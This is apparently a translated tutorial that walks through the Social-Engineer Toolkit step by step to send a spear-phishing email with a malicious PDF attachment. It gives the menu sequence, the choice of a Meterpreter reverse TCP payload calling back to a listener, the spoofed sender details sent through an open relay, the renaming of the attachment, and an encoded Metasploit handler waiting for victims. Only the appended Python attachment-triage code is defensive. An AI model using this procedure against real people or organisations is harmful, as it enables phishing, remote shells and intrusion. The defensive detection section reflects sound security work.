Sending Phishing Emails with the SET Toolkit


2023-09-20 00:13 | Source: compiled from the web

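This article gives a brief but detailed introduction to using the Kali social engineering toolkit to carry out a multi-faceted penetration test of a target organization.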

Configuring the SET Toolkit

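You can use the SET package that ships with the system, or update to the latest version. The update command is shown below (backing up the local set directory first is recommended):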

┌──(root💀kali)-[/usr/share]
└─# git clone https://github.com/trustedsec/social-engineer-toolkit.git set

Spear-Phishing Attack Vector

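This vector carries out the attack through a specially crafted file-format exploit; the example in this article is an Adobe PDF vulnerability. On the client, enter setoolkit to start the toolkit: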

setoolkit

https://www.trustedsec.com

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>

The start screen is shown above. Next, enter 1, 1, 1, 10, 2 in sequence to reach the following panel:

   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]:

Next, enter the listener IP and port (press Enter to accept the defaults). This leads to the following:

set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]:
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Payload creation complete.
[*] All payloads get sent to the template.pdf directory
[*] If you are using GMAIL - you will need to need to create an application password: https://support.google.com/accounts/answer/6010255?hl=en
[-] As an added bonus, use the file-format creator in SET to create your attachment.

   Right now the attachment will be imported with filename of 'template.whatever'

   Do you want to rename the file?

   example Enter the new filename: moo.pdf

    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.

set:phishing>2
set:phishing> New filename:metasploit_set
[*] Filename changed, moving on...

   Social Engineer Toolkit Mass E-Mailer

   There are two options on the mass e-mailer, the first would
   be to send an email to one individual person. The second option
   will allow you to import a list and send it to as many people as
   you want within that list.

   What do you want to do:

    1.  E-Mail Attack Single Email Address
    2.  E-Mail Attack Mass Mailer

    99. Return to main menu.

set:phishing>

Next, select 1, 1, 5 in sequence to reach the following panel:

set:phishing> Send email to:[email protected]

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing>2
set:phishing> From address (ex: [email protected]):[email protected]
set:phishing> The FROM NAME user will see:metasploit
set:phishing> Username for open-relay [blank]:234
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.qq.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:no
set:phishing> Does your server support TLS? [yes|no]:no
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes
[!] The following modules could not be loaded!..|
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] Please see /root/.msf4/logs/framework.log for details.

       =[ metasploit v6.0.43-dev                          ]
+ -- --=[ 2129 exploits - 1137 auxiliary - 363 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: View all productivity tips with the tips command

[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.1.113
LHOST => 192.168.1.113
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.113:443
msf6 exploit(multi/handler) > [*] Sendin

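As you can see, once the parameters are set, the SET toolkit automatically starts Metasploit, configures the handler with those parameters, and waits for the target to take the bait.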
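On the receiving side, the delivery shown above (a PDF attachment renamed to metasploit_set, with no .pdf extension) can be caught at the mail gateway. The following is an added example, not part of the original article or of SET: a Python triage that flags attachments that are PDFs by content but not by name, or that contain automatic-action or active-content keys. The function names, the keyword list and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes
from email.message import EmailMessage

# PDF name keys for automatic actions and active content (list chosen for this example).
RISKY_KEYS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile"]

def triage_attachments(raw: bytes) -> list:
    """Return one finding per attachment whose content is a PDF."""
    findings = []
    for part in message_from_bytes(raw).walk():
        if part.get_content_disposition() != "attachment":
            continue
        data = part.get_payload(decode=True) or b""
        # Readers accept the %PDF- header anywhere in the first 1024 bytes.
        if b"%PDF-" not in data[:1024]:
            continue
        name = part.get_filename() or ""
        # Match whole names only, so /JS does not fire on a longer key.
        # Limitation: hex-escaped names and compressed object streams are not decoded.
        hits = [k.decode() for k in RISKY_KEYS
                if re.search(re.escape(k) + rb"(?![A-Za-z0-9])", data)]
        mismatch = not name.lower().endswith(".pdf")
        findings.append({"filename": name, "name_mismatch": mismatch,
                         "risky_keys": hits, "quarantine": mismatch or bool(hits)})
    return findings

# Constructed, inert PDF-like bytes: structure only, no exploit content.
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
              b"2 0 obj\n<< /S /JavaScript /JS (placeholder) >>\nendobj\n%%EOF\n")

def build_sample(pdf: bytes = SAMPLE_PDF, filename: str = "metasploit_set") -> bytes:
    """Build a constructed test message carrying `pdf` as an attachment."""
    m = EmailMessage()
    m["From"] = "sender@example.com"
    m["To"] = "user@example.org"
    m["Subject"] = "constructed sample"
    m.set_content("see attachment")
    m.add_attachment(pdf, maintype="application", subtype="octet-stream",
                     filename=filename)
    return m.as_bytes()

if __name__ == "__main__":
    for finding in triage_attachments(build_sample()):
        print(finding)
```

A keyword hit is a reason to quarantine and inspect, not proof of an exploit; many legitimate PDFs carry /OpenAction or /EmbeddedFile.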


